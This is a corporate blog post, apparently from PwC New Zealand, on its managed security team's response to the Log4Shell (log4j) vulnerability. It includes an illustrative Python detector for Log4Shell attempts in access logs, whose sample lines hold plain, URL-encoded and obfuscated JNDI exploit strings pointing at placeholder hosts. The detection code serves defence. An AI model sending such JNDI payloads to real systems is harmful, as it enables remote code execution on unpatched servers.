Managed Cyber Defence in Action - Responding to Log4J

A new security risk is causing upheaval in the cybersecurity world after it first gained widespread coverage on the evening of Friday 10 December 2021. 

As with all major vulnerability disclosures, this one did not happen at a convenient time! On Friday evening, the security world sprang into action as CVE-2021-44228, a vulnerability in the log4j library, and its accompanying exploit, better known as Log4Shell, landed as an early Christmas present for us all.

Log4j is a Java software library (or building block) which can be built into applications to help perform logging and monitoring. Libraries such as log4j are easy to integrate and thus widely used, across both open and closed source applications.

Very early in the incident, details emerged on the internet which allowed people to test their servers and understand their exposure. However, similar code also surfaced that enabled remote code execution (RCE), allowing anybody, including relatively unsophisticated threat actors, to launch successful attacks with basic tools. There were also indications that exploitation had been taking place since at least 1 December.

The challenge with a vulnerability like this is its breadth - this is code used across many systems and applications, with over 140,000 open source projects alone using the library, so the potential scope of its impact is both hard to identify and laborious to address, even once the right patches are released.

For our managed cyber defence team, our immediate response was two-fold:

  • Help our clients understand their exposure and implement short term mitigations

  • Understand how attackers are using these exploits in the wild to further tune our detection content. 

Immediate response from a global team

The immediate focus was on protecting our clients' estates - our managed security operations services are built on the Palo Alto Networks Cortex XDR and XSOAR platforms, and our 24/7 team immediately began to apply our threat hunting techniques to identify potentially vulnerable endpoints across all of our clients' estates.

In parallel, our global detection engineering team began to translate initial indicators of compromise (IoCs) and threat intelligence into actionable behavioural indicators of compromise (BIoCs) that would give us the ability to detect and respond to attempts to exploit the newly disclosed vulnerability. Thanks to the fast actions of our friends at Palo Alto Networks, signatures were also put in place on our platforms to detect, block and alert our clients.
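As an added illustration of what turning an IoC into a behavioural detection looks like at the simplest level (this is example code written for this page, not PwC's, Palo Alto Networks' or Cortex XDR's detection content), the block below scans web access-log lines for the log4j lookup pattern that Log4Shell exploitation attempts carry in request fields. The detection itself is an assumption of this example rather than something the post describes: it URL-decodes each line, collapses the nested-lookup obfuscations (`${lower:…}`, `${upper:…}`, `${…:-…}`) that attackers used to evade naive string matches, and then looks for a `${jndi:<scheme>:` lookup. The log lines are constructed samples using documentation IP ranges and example.net hostnames.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post). Line 1 is benign;
# lines 2-4 carry a plain, a URL-encoded and a nested-lookup-obfuscated JNDI string.
SAMPLE_LOG = [
    '203.0.113.10 - - [11/Dec/2021:02:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [11/Dec/2021:02:15:31 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/x}"',
    '203.0.113.12 - - [11/Dec/2021:02:16:02 +0000] "GET /%24%7B%24%7Blower%3Aj%7Dndi%3Armi'
    '%3A%2F%2Flookup.example.net%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.13 - - [11/Dec/2021:02:17:45 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NOPE:-j}ndi:${::-d}ns://canary.example.net/t}"',
]

# Nested lookups that evaluate to a literal: ${lower:X} / ${upper:X} -> X, and the
# default-value form ${anything:-X} -> X (used when "anything" does not resolve).
_NESTED = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.IGNORECASE)

# The behavioural indicator: a JNDI lookup with a scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalise(text):
    """URL-decode (a bounded number of passes) and collapse nested lookups."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(10):  # bounded so hostile input cannot loop forever
        collapsed = _NESTED.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
        if collapsed == text:
            break
        text = collapsed
    return text


def find_log4shell_attempts(lines):
    """Return one record per line that carries a JNDI lookup after normalisation."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalise(line)
        match = _JNDI.search(norm)
        if match:
            hits.append({"line": number, "scheme": match.group(1).lower(), "normalised": norm})
    return hits


if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi scheme={hit['scheme']}")
```

A pattern match like this is a useful first alert but not a complete detection: obfuscation variants beyond the three handled here existed, and a logged string proves an attempt, not a successful exploitation. Pairing it with monitoring of outbound LDAP/RMI/DNS connections from Java processes is what distinguishes blocked attempts from hosts that need incident response.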

By Saturday morning, as most of the western world was waking up to the news, our team of analysts from both the UK and New Zealand had already given each of our clients the comfort that any exploitation attempts would be blocked, along with a list of endpoints on their estate that our platform had identified as carrying the vulnerability. Meanwhile, software vendors across the globe began the process of releasing appropriate patches.

The hard work starts here

Whilst it was great to take a minute and appreciate the steps that had been taken to protect our clients in the short term, we are well aware that the hard work really starts now, as threat actors begin to use more advanced TTPs to target log4j.

We are fortunate to have an industry-leading Threat Intelligence team that continues to track this threat and feed our detection engineering team with the latest TTPs and IoCs, in order to keep enhancing and refining the detection content within our platform and to guide the threat hunting we perform daily across all of our clients' estates:

Figure: PwC detection methodology. Threat hunting activities: 1. Threat Intelligence feeds; 2. Threat Advisory releases; 3. Detections created on our platform using IoCs and hashes; 4. Proactive threat hunts initiated; 5. Continuous tuning and monitoring.

It is thanks to these fast-moving actions across our Cyber teams and our partners that we can remain confident we are keeping abreast of the latest threats, and that we have processes in place to help mitigate or remediate these issues whether they happen at 9am on a Monday morning or (more likely!) at 6pm on a Friday evening.

To find out more about our Managed Cyber Defence or Threat Intelligence services please contact: Julian Bruce-Miller, Director.

Contact us

Craig Maskell

Cyber Consulting Partner, Wellington, PwC New Zealand

+64 21 915 380
